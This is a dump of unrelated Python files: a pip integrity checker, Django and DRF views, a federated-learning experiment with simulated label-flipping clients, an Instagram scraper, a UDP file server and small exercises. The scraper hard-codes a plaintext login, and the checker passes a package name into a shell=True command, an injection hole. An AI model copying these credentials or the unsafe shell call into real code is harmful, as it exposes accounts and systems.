            print("\nMore than one package were found for " + package + " " + "package, please write the full name "
                  "of the package within the following "
                  + str(len(package_info[:, 0])) + " packages:\n ")
        else:
            print("\nThe package " + package + " has been found but several packages can match this name, please "
                  "confirm the full name of the package you want to check within the "
                  "following "
                  + str(len(package_info[:, 0])) + " packages:\n\n ")
        # Pad the left column to the longest name for alignment.
        max_len = 0
        for package_name in package_info[:, 0]:
            max_len = max(max_len, len(package_name))
        str_to_print = ""
        for pack_ind, package_name in enumerate(package_info[:, 0]):
            if pack_ind % 2 == 0:
                str_to_print = package_name + " " * (max_len - len(package_name) + 2)
                if pack_ind == len(package_info[:, 0]) - 1:
                    print(str_to_print)   # odd count: last name sits alone on its row
            else:
                str_to_print = str_to_print + package_name
                print(str_to_print)
        print("")
        print(">> ", end='')
        new_package = input()
        if is_in_package_list:
            if new_package == package:
                # User confirmed the exact name: look up its version.
                index = np.where(package_info[:, 0] == package)[0][0]
                package_version = package_info[index][1]
                found_package = (package, package_version)
                return found_package
            else:
                # User typed a different name: recurse to validate it.
                found_package = find_check_package(package=new_package)
                return found_package
        else:
            found_package = find_check_package(package=new_package)
            return found_package
def download_pip_package(package_name, package_version=None, download_dir='download_dir',
                         already_downloaded_package=None):
    """Download one pip package (without dependencies) into *download_dir*.

    Returns the absolute path of the downloaded archive, the path of
    *already_downloaded_package* when one was supplied, or None on failure.
    The download directory is emptied first so listdir()[0] is unambiguous.
    """
    if already_downloaded_package is not None:
        # Caller already has the archive; just resolve it against the cwd.
        return os.getcwd() + "/" + already_downloaded_package
    # exist_ok replaces the original try/except FileExistsError dance.
    os.makedirs(download_dir, exist_ok=True)
    # Clear any leftovers from a previous run.
    for filename in os.listdir(download_dir):
        file_path = os.path.join(download_dir, filename)
        try:
            if os.path.isfile(file_path) or os.path.islink(file_path):
                os.unlink(file_path)
            elif os.path.isdir(file_path):
                shutil.rmtree(file_path)
        except Exception as e:
            print('Failed to delete %s. Reason: %s' % (file_path, e))
    os.chdir(download_dir)
    try:
        # SECURITY FIX: argument-list form (shell=False) prevents shell
        # injection through a crafted package name; the original interpolated
        # the name into a shell command string.
        subprocess.check_call(
            ['pip', 'download', '--no-deps', package_name + '==' + package_version])
    except Exception:
        print("A problem occurred while downloading the package " + package_name + " in version " + package_version)
        return None
    finally:
        # BUG FIX: the original only chdir'd back on success, leaving the
        # process stranded inside download_dir after a failed download.
        os.chdir('../')
    print("")
    return os.getcwd() + "/" + download_dir + "/" + os.listdir(download_dir)[0]
def check_package(package=None, download_dir='download_dir', already_downloaded_package=None, debug=False, keep=False,
                  diff=False, listing=False):
    """Verify an installed pip package against a freshly downloaded legitimate copy.

    Hashes every installed file and classifies it as legitimate / corrupted /
    unknown relative to the reference archive. Flags: debug (verbose), keep
    (retain the temp extraction dir), diff (show diffs of corrupted files),
    listing (print the per-category file lists). Always returns 0.
    """
    package_info = find_check_package(package)
    if package_info is None:
        return 0
    package_name, package_version = package_info[0], package_info[1]
    # Locate the installed copy via `pip show`'s Location field.
    cmd = "pip show " + package_name + " | egrep \"^Location\""
    byte_out = subprocess.check_output(cmd, shell=True)
    string_out = byte_out.decode("utf-8")
    package_location = re.sub(r"\s", "", string_out.split(" ")[1])
    print("\nThe check for package " + package_name + " at version " + str(
        package_version) + " has started\n")
    # NOTE(review): a failed download returns None and would break the
    # extraction call below — confirm intended handling.
    legitimate_package = download_pip_package(package_name, package_version, download_dir, already_downloaded_package)
    if already_downloaded_package is not None:
        print("Checking with the folowing legitimate package: ")
        print(already_downloaded_package)
        print("")
    if debug:
        print("Legitimate package downloaded at " + legitimate_package)
    # Extract the reference archive, hash it, then hash the installed files.
    extraction_directory = Retrieve_Hash_Custom_PIP_Package.extract_package_current_directory(package_name,
                                                                                              legitimate_package,
                                                                                              debug=debug)
    hash_file_name, extracted_folder_name = Retrieve_Hash_Custom_PIP_Package.compute_hashes_legit_package(extraction_directory)
    legit_files, corrupted_files, unknown_file, path_to_corrupted_files = Retrieve_Hash_Custom_PIP_Package.compute_hashes_package_installed(
        package_location, package_name, hash_file_name, extraction_directory, debug=debug)
    if diff:
        # Show textual differences for each corrupted file.
        Retrieve_Hash_Custom_PIP_Package.compute_differences(package_name, extraction_directory, corrupted_files,
                                                             path_to_corrupted_files, extracted_folder_name, debug=debug)
    if not keep:
        Retrieve_Hash_Custom_PIP_Package.delete_temp_extraction_directory(debug=debug)
    if debug or listing:
        # Colour-coded per-category listing: green legit, red corrupted, yellow unknown.
        print(Fore.GREEN + "Legitimate files:"+Style.RESET_ALL)
        if len(legit_files) == 0:
            print('None')
        else:
            print(*legit_files, sep = ", ")
        print(Fore.RED)
        print("Corrupted files:"+Style.RESET_ALL)
        if len(corrupted_files) == 0:
            print('None')
        else:
            print(*corrupted_files, sep = ", ")
        print(Fore.YELLOW)
        print("Unknown files:"+Style.RESET_ALL)
        if len(unknown_file) == 0:
            print('None')
        else:
            print(*unknown_file, sep = ", ")
        print("")
    init(autoreset=True)
    # Final verdict banner.
    if len(corrupted_files) > 0:
        print(Fore.RED + Style.BRIGHT + Back.LIGHTBLACK_EX + "RESULTS: Some corrupted files were found:")
        print(*corrupted_files, sep=',')
        print(Style.RESET_ALL)
    else:
        print(Fore.GREEN + Style.BRIGHT +Back.LIGHTBLACK_EX + "RESULTS: No corrupted file has been found" + Style.RESET_ALL + "\n")
    return 0
|
from django.shortcuts import redirect, render
from .forms import PostForm
from .models import Volunteer
def volunteers(request):
    """List all volunteers, newest first; anonymous users go to registration."""
    if not request.user.is_authenticated:
        return redirect('/register')
    volunteer_list = Volunteer.objects.order_by('-date')
    context = {'volunteer_list': volunteer_list}
    return render(request, 'volunteers/volunteers.html', context)
def register(request):
    """Show the volunteer registration form; persist valid POST submissions.

    BUG FIX: form.save() already persists the instance; the original then
    called post.save() again, issuing a redundant second database write.
    An invalid POST falls through and re-renders the bound form with errors.
    """
    if request.method == "POST":
        form = PostForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('/message')
    else:
        form = PostForm()
    return render(request, 'volunteers/register.html', {'form': form})
def message(request):
    """Render the static confirmation page shown after a successful registration."""
    return render(request, 'volunteers/message.html')
def main():
    """Ask for a file name and print its lines with 1-based line numbers.

    BUG FIXES: the original opened the file TWICE (once to count lines via
    `sum(1 for line in open(nimi))`, leaking that second handle) and never
    used a context manager; it also caught FileExistsError, which open() in
    read mode can never raise. A single `with` + enumerate does the same job,
    and OSError covers FileNotFoundError/PermissionError and friends.
    """
    nimi = input("Syötä tiedoston nimi: ")
    try:
        with open(nimi, "r") as tiedostomuuttuja:
            for i, rivi in enumerate(tiedostomuuttuja, start=1):
                print(i, rivi.rstrip())
    except OSError:
        print("Virhe tiedoston lukemisessa.")

main()
"""Author: Akash Shah (ass502)
unittest for test_grades method in the calculate module"""
from calculate import *
from unittest import TestCase
class GradesTest(TestCase):
    """Unit tests for calculate.test_grades (trend of a grade sequence)."""

    def test_static_grades(self):
        # Flat (or single-entry) grade history -> 0.
        self.assertEqual(test_grades(['A', 'A', 'A']), 0)
        self.assertEqual(test_grades(['B']), 0)

    def test_increasing_grades(self):
        # Improving grades -> 1.
        self.assertEqual(test_grades(['C', 'B', 'A']), 1)
        self.assertEqual(test_grades(['B', 'C', 'B', 'A']), 1)

    def test_decreasing_grades(self):
        # Worsening grades -> -1.
        self.assertEqual(test_grades(['A', 'B', 'C']), -1)
        self.assertEqual(test_grades(['A', 'B', 'C', 'B']), -1)
import os
import argparse
import datetime
from copy import deepcopy
import traceback
import numpy as np
import torch
import torch.nn as nn
import torch.multiprocessing as mp
from torch.optim import SGD
from torch.utils.data import DataLoader
from omegaconf import OmegaConf
import ruamel.yaml
yaml = ruamel.yaml.YAML()
from loguru import logger
import tensorboardX as tbx
from tqdm import tqdm
import itertools
import _init_paths
from clients.base import BaseClient
from servers.gncfl import GNByzantineClusteredFederatedLearning as GNCFL
from datasets.mnist import MnistDataset
from utils.general import seed_everything, get_lr, load_conf
from utils.data import get_mnist_data
from utils.data_split import sorted_split, random_split
from schedulers.alpha_scheduler import *
class CNN(nn.Module):
    """Small LeNet-style convnet with a 10-way linear head.

    fc1's in_features of 800 (= 32 * 5 * 5) implies a 1x32x32 input.
    """

    def __init__(self):
        super().__init__()
        self.conv1 = nn.Conv2d(1, 32, 5)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d((2, 2))
        self.conv2 = nn.Conv2d(32, 32, 5)
        self.fc1 = nn.Linear(800, 256)
        self.fc2 = nn.Linear(256, 10)

    def forward(self, x):
        # Two conv -> relu -> pool stages.
        for conv in (self.conv1, self.conv2):
            x = self.maxpool(self.relu(conv(x)))
        # Flatten and classify.
        hidden = self.relu(self.fc1(torch.flatten(x, 1)))
        return self.fc2(hidden)
def setup_dataset(cfg):
    """Load MNIST and partition the training set into per-client datasets.

    Shards are built IID or sorted-by-label depending on cfg.iid, then
    cfg.shards_per_client randomly chosen shards are concatenated for each
    of cfg.n_clients clients.

    Returns (train_imgs, train_labels, test_img, test_label, img_channel)
    where the first two are lists of per-client arrays.
    """
    train_img, train_label, test_img, test_label = get_mnist_data("../data/mnist")
    img_channel = 1  # MNIST is grayscale
    n_shards = cfg.n_clients * cfg.shards_per_client
    split_fn = random_split if cfg.iid else sorted_split
    train_img, train_label = split_fn(train_img, train_label, n_shards=n_shards)
    assert n_shards == len(train_img)
    # Deal every shard exactly once, in random order, across the clients.
    shard_order = np.random.choice(n_shards, n_shards, replace=False)
    clients_shards_indice = np.split(shard_order, cfg.n_clients)
    client_imgs, client_labels = [], []
    for idx in clients_shards_indice:
        client_imgs.append(np.concatenate(train_img[idx], axis=0))
        client_labels.append(np.concatenate(train_label[idx], axis=0))
    assert len(client_imgs) == cfg.n_clients
    return client_imgs, client_labels, test_img, test_label, img_channel
def setup_client(cfg, train_img, train_label, img_channel):
    """Build one BaseClient per (images, labels) pair.

    Each client gets its own fresh CNN, SGD optimizer (cfg.lr),
    cross-entropy criterion, and shuffling DataLoader (cfg.batch_size).
    img_channel is currently unused but kept for signature compatibility.
    """
    def _build(images, labels):
        # One independent model/optimizer/dataloader per client.
        net = CNN()
        loader = DataLoader(
            MnistDataset(images, labels, 32),
            batch_size=cfg.batch_size,
            shuffle=True,
            pin_memory=True,
            num_workers=0,
            drop_last=True,
        )
        return BaseClient(
            model=net,
            optimizer=SGD(net.parameters(), lr=cfg.lr),
            criterion=torch.nn.CrossEntropyLoss(),
            dataloader=loader,
        )

    return [_build(images, labels) for images, labels in zip(train_img, train_label)]
def local_update(args):
    """Pool-worker shim: unpack (client, epoch) and run one local pass.

    multiprocessing's imap_unordered passes a single argument, hence the
    packed tuple instead of two parameters.
    """
    client, epoch = args[0], args[1]
    client.local_update(epoch=epoch)
def main(cfg_path):
    """Run the GNCFL federated-learning experiment described by the config.

    Loads the YAML config, builds clients (the first cfg.n_noise of which
    get corrupted labels per cfg.adv), trains for cfg.n_rounds rounds with
    clustering-based aggregation, and writes logs/tensorboard/history
    under ../logs/<script>/<timestamp>/.
    """
    logger.debug(f"load config : {cfg_path}")
    cfg = load_conf(cfg_path)
    logger.debug('\n' + OmegaConf.to_yaml(cfg))
    logger.debug(f"set seed : {cfg.seed}")
    seed_everything(cfg.seed)
    # Log directory layout: ../logs/<script basename>/<timestamp>/
    exp_name = os.path.splitext(os.path.basename(__file__))[0]
    timestamp = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    logdir = os.path.join("../logs/", exp_name)
    os.makedirs(logdir, exist_ok=True)
    logdir = os.path.join(logdir, timestamp)
    os.makedirs(logdir, exist_ok=True)
    logger.debug(f"make log directory : {logdir}")
    logger.add(os.path.join(logdir, "log.txt"), level="DEBUG")
    writer = tbx.SummaryWriter(logdir)
    # Persist the resolved config next to the logs for reproducibility.
    with open(os.path.join(logdir, "config.yaml"), 'w') as f:
        yaml.dump(dict(cfg), f)
    logger.debug(f"setup dataset")
    train_img, train_label, val_img, val_label, img_channel = setup_dataset(cfg)
    logger.debug(f"setup client")
    clients = setup_client(cfg, train_img, train_label, img_channel)
    logger.debug(f"num of client : {len(clients)}")
    n_noise = cfg.n_noise
    logger.debug(f"The number of Noise Client is {n_noise}.")
    faild_label_pair = np.array([6, 7, 5, 8, 9, 2, 0, 1, 3, 4])  # label-flip mapping for noise clients
    # Corrupt the labels of the first n_noise clients according to cfg.adv.
    for i in range(n_noise):
        if cfg.adv == 'zero':
            # Every label forced to class 0.
            clients[i].dataloader.dataset.labels = np.zeros_like(clients[i].dataloader.dataset.labels)
        elif cfg.adv == 'rand':
            # Every label replaced by a uniform random class.
            clients[i].dataloader.dataset.labels = np.random.randint(0, 10, clients[i].dataloader.dataset.labels.shape)
        elif cfg.adv == 'flip':
            # Deterministic flip via the pairing table above.
            clients[i].dataloader.dataset.labels = faild_label_pair[clients[i].dataloader.dataset.labels]
        elif cfg.adv == 'prand':
            percentage = np.random.rand()  # random fraction of labels to corrupt
            n_noise_data = int(percentage * len(clients[i].dataloader.dataset.labels))
            noise_index = np.random.choice(np.arange(len(clients[i].dataloader.dataset.labels)), n_noise_data, replace=False)
            clients[i].dataloader.dataset.labels[noise_index] = np.random.randint(0, 10, clients[i].dataloader.dataset.labels[noise_index].shape)
    logger.debug(f"setup server")
    # -- server setup --
    val_dataloader = DataLoader(
        MnistDataset(val_img, val_label, 32),
        batch_size=cfg.batch_size,
        num_workers=cfg.num_workers,
    )
    server = GNCFL(
        model=deepcopy(clients[0].model),
        clients=clients,
        criterion=torch.nn.CrossEntropyLoss(),
        dataloader=val_dataloader)
    history = np.zeros((cfg.n_rounds, 5))  # loss, accuracy, xsim, n_bengin, n_adv
    logger.debug("start training")
    logger.debug(f"| {'step':^10} | {'loss':^12} | {'accuracy':^12} | {'lr':^12} | {'xsim':^8} | {'bengin':^6} | {'adv':^6}")
    # analysis
    similarity_matrix = np.zeros((cfg.n_rounds, len(clients), len(clients)))
    if cfg.adv == 'clean':
        # No real adversaries: pre-assign benign/adv index sets for bookkeeping.
        # NOTE(review): 100 looks like a hard-coded total client count — confirm
        # it matches cfg.n_clients.
        server.benign = np.arange(n_noise, 100)
        server.adv = np.arange(n_noise)
    if cfg.alpha_scheduler == "linear":
        alpha_scheduler = LinearAlphaScheduler(cfg.alpha, cfg.linear_epoch)
    elif cfg.alpha_scheduler == 'cos':
        alpha_scheduler = CosAlphaScheduler(cfg.alpha, cfg.cos_cycle)
    else:
        alpha_scheduler = StaticAlphaScheduler(cfg.alpha)
    for t in range(cfg.n_rounds):
        alpha_scheduler.step()
        samples = [client for client in clients]
        # send parameter from server to client
        for client in samples:
            client.model.load_state_dict(server.model.state_dict())
        # device: CPU -> GPU
        for client in samples:
            client.to(cfg.device)
        # local update
        if cfg.parallel:
            with mp.Pool(min(cfg.threads, mp.cpu_count())) as p:
                with tqdm(total=len(samples), leave=False) as tq:
                    for _ in p.imap_unordered(local_update, zip(samples,[cfg.local_epoch] * len(samples))):
                        tq.update(1)
        else:
            for client in tqdm(samples, leave=False):
                client.local_update(epoch=cfg.local_epoch)
        # device: GPU -> CPU
        for client in samples:
            client.to("cpu")
        xsim, simmat, cls1, cls2 = server.clustering(thresh=cfg.thresh, alpha=alpha_scheduler.alpha)
        similarity_matrix[t] = simmat
        n_benign = len(server.benign)
        n_adv = len(server.adv)
        server.aggregate()
        server.to(cfg.device)
        loss, accuracy = server.eval()
        server.to("cpu")
        lr = get_lr(clients[0].optimizer)
        # log_param
        writer.add_scalar('loss', loss, t)
        writer.add_scalar('accuracy', accuracy, t)
        history[t, 0] = loss
        history[t, 1] = accuracy
        history[t, 2] = xsim
        history[t, 3] = n_benign
        history[t, 4] = n_adv
        logger.debug(f"| {t:>10} | {round(loss, 7):>12} | {round(accuracy, 7):>12} | {round(lr, 7):>12} | {round(xsim, 5):>8} | {n_benign:>6} | {n_adv:>6}")
    # Persist per-round metrics and the full similarity tensor for analysis.
    np.save(os.path.join(logdir, 'history.npy'), history)
    np.save(os.path.join(logdir, 'simmat.npy'), similarity_matrix)
if __name__ == "__main__":
    try:
        # Use the 'spawn' start method for all worker processes
        # (must be set before any Process/Pool is created).
        mp.set_start_method('spawn')
        cfg_path = "../config/gncfl_mnist.yaml"
        main(cfg_path)
    except Exception as e:
        # Top-level boundary: log the full traceback instead of crashing silently.
        logger.error(traceback.format_exc())
from selenium import webdriver
import time
# Scrapes the captions of the first 12 posts under the #ootd tag on Instagram.
# NOTE(review): credentials are hard-coded in plain text below — move them to
# environment variables or a secrets store before sharing/committing this file.
# NOTE(review): driver.find_element_by_css_selector / find_elements_by_css_selector
# were removed in Selenium 4 — presumably this targets Selenium 3; confirm the
# pinned version.
# Open a Chrome window (webdriver)
driver = webdriver.Chrome("./chromedriver")
# Navigate to the #ootd tag search-result page
driver.get("https://www.instagram.com/explore/tags/ootd/")
log = driver.find_element_by_css_selector("button.sqdOP")
log.click()
time.sleep(1)
# Fill in the login form (box[0] = username, box[1] = password)
box = driver.find_elements_by_css_selector("input._2hvTZ")
box[0].send_keys("ijieun403")
box[1].send_keys("jieunlee308^^")
login = driver.find_element_by_css_selector("button.sqdOP.L3NKy")
login.click()
# Keep the first 12 post containers
instagram = driver.find_elements_by_css_selector("div.v1Nh3")
instagram = instagram[:12]
# Iterate over the containers
for insta in instagram:
    # Click the post to open its modal
    insta.click()
    # Wait for the modal to load
    time.sleep(1)
    # Select and print the caption text
    post = driver.find_element_by_css_selector("div.C4VMK span").text
    print(post)
    # Click the close button
    but_close = driver.find_element_by_css_selector("button.ckWGn")
    but_close.click()
# Generated by Django 2.2.4 on 2019-09-29 02:52
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: make JobOpening.company_email optional (blank + null)."""
    dependencies = [
        ('job', '0021_auto_20190927_2030'),
    ]
    operations = [
        migrations.AlterField(
            model_name='jobopening',
            name='company_email',
            field=models.EmailField(blank=True, max_length=254, null=True),
        ),
    ]
|
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
def display(x,indx):
    # Pretty-print the current iterate: iteration number, x, f(x) and the
    # gradient, separated by ASCII rules.
    # Relies on module globals f and gradF (defined in the __main__ block).
    # Python 2 print-statement syntax.
    star = "************************\n"
    dash = "----------"
    print star + "=>>" + str(indx) + ".iteration\n" + star + "x:\n" + dash
    print x
    print dash + "\nf(x):\n" + dash + "\n" +str(f(x)) + "\n" + dash + "\nGradF:\n" + dash
    print gradF(x)
def gradF(x):
    """Analytic gradient of the Rosenbrock objective at point x.

    x is a length-2 array-like; returns a (2, 1) float ndarray.
    """
    g0 = (-400.0 * x[0] * (x[1] - x[0] ** 2)) - 2.0 * (1 - x[0])
    g1 = 200.0 * (x[1] - x[0] ** 2)
    return np.array([[g0], [g1]], dtype=float)
def iterF(inVect):
    """Fixed-step gradient descent starting from inVect.

    Runs at most 25001 iterations; prints progress every 100 via display().
    Stops early when both the iterate's norm falls below eps2 and the change
    in objective value falls below eps1. Relies on module globals
    alpha, eps1, eps2 and f. Mutates and returns inVect.
    """
    currentX = inVect
    for k in range(25001):
        if (k % 100 == 0):
            display(currentX, k)
        # Bug fix: copy, don't alias. The in-place `+=` below would otherwise
        # mutate prevX too, so f(currentX) - f(prevX) was always exactly 0 and
        # the objective-change test never measured anything.
        prevX = currentX.copy()
        currentX += (-1 * alpha) * gradF(prevX).reshape(2)
        funcValue = abs(f(currentX) - f(prevX))
        if (np.linalg.norm(currentX) < eps2) and (funcValue <= eps1):
            break
    return currentX
if __name__ == '__main__':
    # Gradient-descent driver: fixed step size and two stopping tolerances.
    alpha = 0.001
    eps1 = 1e-18
    eps2 = 1e-4
    # NOTE(review): gradF above is the gradient of the Rosenbrock function
    # 100*(x[1]-x[0]^2)^2 + (1-x[0])^2, but this lambda swaps the arguments
    # and subtracts the second term — f and gradF appear inconsistent;
    # confirm which formula was intended.
    f = lambda x : (100.0*((x[0]-(x[1]**2))**2)) - (1.0-(x[0])**2)
    inX = np.array([1.2,1.2],dtype=np.double)
    locMin = iterF(inX)
    print "----------\nLocal minimizer of function is \n", locMin
    # Plot an arrow from the origin to the found minimizer.
    axes = plt.gca()
    axes.set_xlim([-0.1,5])
    axes.set_ylim([-0.1,5])
    ax = plt.axes()
    ax.arrow(0, 0, locMin[0], locMin[1], head_width=0.05, head_length=0.1, fc='k', ec='k')
    plt.show()
|
import socket
import time
import multiprocessing
from concurrent.futures import ProcessPoolExecutor as Pool
from Packet import create_packet, decode_header, Packet
from Constants import SERVER_PORT, CHUNK_SIZE, DATA_SIZE, SERVER_ADDRESS, HEADER_SIZE, WINDOW_SIZE, SEND_TIMEOUT, FINACK_WAIT
from pathlib import Path
import math
def send_with_timeout(s, data, address, left_seq, seq_no, acked):
    """Send one packet and spin until its ACK flag is set.

    Run as a short-lived process: the caller bounds the wait via
    join(SEND_TIMEOUT) and terminates us, which is what implements the
    retransmission timeout. `left_seq` is unused here but kept so all
    worker targets share one signature.
    """
    # print(f'SENDING...{decode_header(data[:HEADER_SIZE]).seq_no, data[HEADER_SIZE:]}')
    s.sendto(data, address)
    while not acked[seq_no]:
        time.sleep(0.1)
def send_chunk(s, data, address, seq_no, left_seq, acked):
    """Reliably deliver one packet.

    Keeps launching a bounded-lifetime sender process until the packet's
    ACK flag flips; each attempt is capped at SEND_TIMEOUT seconds, which
    yields retransmission on timeout.
    """
    while not acked[seq_no]:
        sender = multiprocessing.Process(
            target=send_with_timeout,
            args=(s, data, address, left_seq, seq_no, acked),
        )
        sender.start()
        sender.join(SEND_TIMEOUT)
        sender.terminate()
def receive(s, left_seq, acked):
    """Collector loop: read ACK packets off the socket and record them.

    left_seq -- one-element shared list; left_seq[0] counts ACKed packets
        and drives send_file's completion wait.
    acked -- shared seq_no -> bool map flipped when that packet is ACKed.
    Runs forever; the parent terminates this process once the transfer is done.
    """
    while True:
        header, _ = s.recvfrom(CHUNK_SIZE)
        header = decode_header(header[:HEADER_SIZE])
        if header.pkt_type == Packet.ACK:
            # print(f'Received: {header.seq_no}')
            acked[header.seq_no] = True
            left_seq[0] += 1
def finack_wait(ss, recv_fin):
    """Block for one datagram; if it is an ACK (the FINACK), set recv_fin[0].

    Run in a short-lived process so the caller can bound the wait with
    join(FINACK_WAIT) and then terminate us.
    """
    header, address = ss.recvfrom(CHUNK_SIZE)
    header = decode_header(header[:HEADER_SIZE])
    if header.pkt_type == Packet.ACK:
        recv_fin[0] = True
def send_file(ss, left_seq, acks):
    """Serve one reliable file transfer of File.txt over UDP.

    Protocol: wait for a SYN; chunk the file into sequence-numbered packets;
    fan sends out over a process pool bounded by WINDOW_SIZE while a
    separate process collects ACKs; finish with a FIN / FINACK handshake
    (up to 20 FIN retries).

    left_seq -- shared one-element list counting ACKed packets.
    acks -- shared per-sequence-number ACK flags.
    """
    # Wait for a SYN packet
    header, address = ss.recvfrom(CHUNK_SIZE)
    header = decode_header(header[:HEADER_SIZE])
    if header.pkt_type == Packet.SYN:
        packets = []
        # Start sending packets asynchronously, upper bounded by window size (max pool size)
        with open('File.txt', 'rb') as file:
            s_no = 0
            while True:
                chunk = file.read(DATA_SIZE)
                if not chunk:
                    break
                packet = create_packet(data=chunk, seq_no=s_no)
                packets.append(packet)
                s_no += 1
        # ACK collector runs for the duration of the transfer.
        rproc = multiprocessing.Process(target=receive, args=(ss, left_seq, acks))
        rproc.start()
        with Pool(max_workers=WINDOW_SIZE) as send_pool:
            for i, packet in enumerate(packets):
                time.sleep(0.05)
                send_pool.submit(send_chunk, ss, packet, address, i, left_seq, acks)
            # Block until every packet has been ACKed.
            while left_seq[0] < len(packets):
                time.sleep(0.1)
        rproc.terminate()
        i = 0
        # Handle FINACK
        while True:
            i += 1
            fin_packet = create_packet(Packet.FIN)
            ss.sendto(fin_packet, address)
            recv_finack = multiprocessing.Manager().list()
            recv_finack.append(False)
            pfinack = multiprocessing.Process(target=finack_wait, args=(ss, recv_finack))
            pfinack.start()
            pfinack.join(FINACK_WAIT)
            pfinack.terminate()
            # Give up after 20 unanswered FINs.
            if recv_finack[0] or i > 20:
                break
    return
if __name__ == '__main__':
    serversocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    serversocket.bind((SERVER_ADDRESS, SERVER_PORT))
    # Manager-backed shared state visible to all worker processes.
    manager = multiprocessing.Manager()
    left_seq_no = manager.list()
    left_seq_no.append(0)
    window_acks = manager.list()
    # One ACK flag per DATA_SIZE-sized chunk of File.txt.
    window_acks += [False for _ in range(math.ceil(Path('File.txt').stat().st_size / DATA_SIZE))]
    # Start process for sending file
    psend = multiprocessing.Process(target=send_file, args=(serversocket, left_seq_no, window_acks))
    psend.start()
    psend.join()
    psend.terminate()
    serversocket.close()
|
import random
# Simple console Hangman: the secret word is fixed and the player has 10 turns.
# NOTE(review): `random` is imported but never used.
name=input('Enter your name?')
print("Hello, "+name+" Time to play Hangman!!")
# create a variable to set secret
word="secret"
# create a variable with empty value
guesses=''
# determine the number of turns
turns=10
while turns>0:
    # Render the word, counting letters still hidden.
    failed=0
    for char in word:
        if char in guesses:
            print(char,end=' ')
        else:
            print("_",end=' ')
            failed+=1
    # No hidden letters left: the player has won.
    if failed==0:
        print("Congratulations ",name," You Won !!")
        break
    # NOTE(review): the guess is not validated — multi-character or repeated
    # wrong guesses each cost a turn again; consider guarding against that.
    guess=input('Guess your character: ')
    guesses+=guess
    if guess not in word:
        turns-=1
        print("Your guess is wrong")
        print('you have ',turns,' more turns')
        if turns==0:
            # NOTE(review): "loose" is a typo for "lose" in the message below.
            print("Oops ",name,' You loose !!')
|
import django_filters.rest_framework
from django import shortcuts
from rest_framework import filters
from rest_framework import permissions
from rest_framework import response
from rest_framework import viewsets
import shop.models
import shop.permissions
import shop.serializers
class CategoryViewSet(viewsets.ReadOnlyModelViewSet):
    """Read-only list/retrieve API for shop categories."""
    queryset = shop.models.Category.objects.all()
    serializer_class = shop.serializers.CategorySerializer
class ItemViewSet(viewsets.ModelViewSet):
    """CRUD API for shop items.

    Anonymous users get read-only access; only an item's owner may modify it.
    Supports filtering by owner username and category, and ordering by
    price, view count and creation time. Retrieving a single item bumps its
    view counter.
    """
    queryset = shop.models.Item.objects.all()
    serializer_class = shop.serializers.ItemSerializer
    permission_classes = [permissions.IsAuthenticatedOrReadOnly,
                          shop.permissions.IsOwnerOrReadOnly]
    filter_backends = (django_filters.rest_framework.DjangoFilterBackend, filters.OrderingFilter)
    filterset_fields = ('owner__username', 'category',)
    ordering_fields = ('price', 'number_of_views', 'created_at',)

    # def list(self, request, *args, **kwargs):
    #     """
    #     increases number_of_views counter each time all items are loaded
    #     """
    #     self.queryset.update(number_of_views=models.F('number_of_views') + 1)
    #     serializer = shop.serializers.ItemSerializer(self.queryset, many=True)
    #     return response.Response(serializer.data)

    def retrieve(self, request, *args, **kwargs):
        """Return a single item, atomically incrementing its view counter."""
        from django.db.models import F  # local import: keeps module imports untouched
        item = shortcuts.get_object_or_404(shop.models.Item.objects.all(), pk=kwargs['pk'])
        # Bug fix: `item.number_of_views += 1; item.save()` is a read-modify-write
        # that loses updates under concurrent requests. F() pushes the increment
        # into a single SQL UPDATE instead.
        item.number_of_views = F('number_of_views') + 1
        item.save(update_fields=['number_of_views'])
        # Reload the concrete value so the serializer emits an int, not an F().
        item.refresh_from_db(fields=['number_of_views'])
        serializer = shop.serializers.ItemSerializer(item)
        return response.Response(serializer.data)

    def perform_create(self, serializer):
        """Attach the requesting user as the item's owner on creation."""
        serializer.save(owner=self.request.user)
|
"""记录一些算法题"""
from typing import List
from queue import Queue
def numIslands(grid: List[List[str]]) -> int:
    """Count 4-connected islands of "1" cells using BFS.

    Mutates grid in place: cells of the k-th island found are relabelled
    with str(k + 1). Returns the number of islands; 0 for an empty grid.
    """
    if not grid:
        return 0
    direct_coors = [(0, -1), (-1, 0), (0, 1), (1, 0)]  # 4-neighbour offsets
    index = 1  # island label; islands found = index - 1
    q = Queue()
    for i in range(len(grid)):
        for j in range(len(grid[0])):
            if grid[i][j] == "1":
                index += 1
                # Fix: mark the seed the same way as its neighbours (str(index));
                # the original stored a bare int here and also left a debug print.
                grid[i][j] = str(index)
                q.put((i, j))
                while not q.empty():
                    cur = q.get()
                    for offset in direct_coors:
                        row, col = cur[0] + offset[0], cur[1] + offset[1]
                        # Skip neighbours outside the grid.
                        if (row < 0 or row >= len(grid)
                                or col < 0 or col >= len(grid[0])):
                            continue
                        if grid[row][col] == "1":
                            q.put((row, col))
                            grid[row][col] = str(index)  # mark visited
    return index - 1
def numIslands_dfs(grid: List[List[str]]) -> int:
    """Count 4-connected islands of "1" cells using depth-first search.

    Mutates grid in place via dfs(), which relabels each island's cells
    with its label. Returns the island count; 0 for an empty grid.
    """
    if not grid:
        return 0
    island_id = 1  # next label; islands found = island_id - 1
    for r in range(len(grid)):
        for c in range(len(grid[0])):
            if grid[r][c] == "1":
                island_id += 1
                dfs(grid, r, c, island_id)
    return island_id - 1
def dfs(grid, row, col, index):
    """Flood-fill: relabel the "1"-component containing (row, col) with str(index).

    Out-of-bounds coordinates and non-"1" cells are no-ops, which also
    terminates the recursion.
    """
    in_bounds = 0 <= row < len(grid) and 0 <= col < len(grid[0])
    if not in_bounds or grid[row][col] != "1":
        return
    grid[row][col] = str(index)  # mark visited with the island label
    # Recurse into the four neighbours: left, up, right, down.
    for d_row, d_col in ((0, -1), (-1, 0), (0, 1), (1, 0)):
        dfs(grid, row + d_row, col + d_col, index)
if __name__ == '__main__':
    # Smoke test: a 4x5 grid with three islands; expected output is 3.
    arr = [["1","1","0","0","0"],
           ["1","1","0","0","0"],
           ["0","0","1","0","0"],
           ["0","0","0","1","1"]]
    result = numIslands_dfs(arr)
    print(result)
|
# Generated by Django 3.1.5 on 2021-01-06 19:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
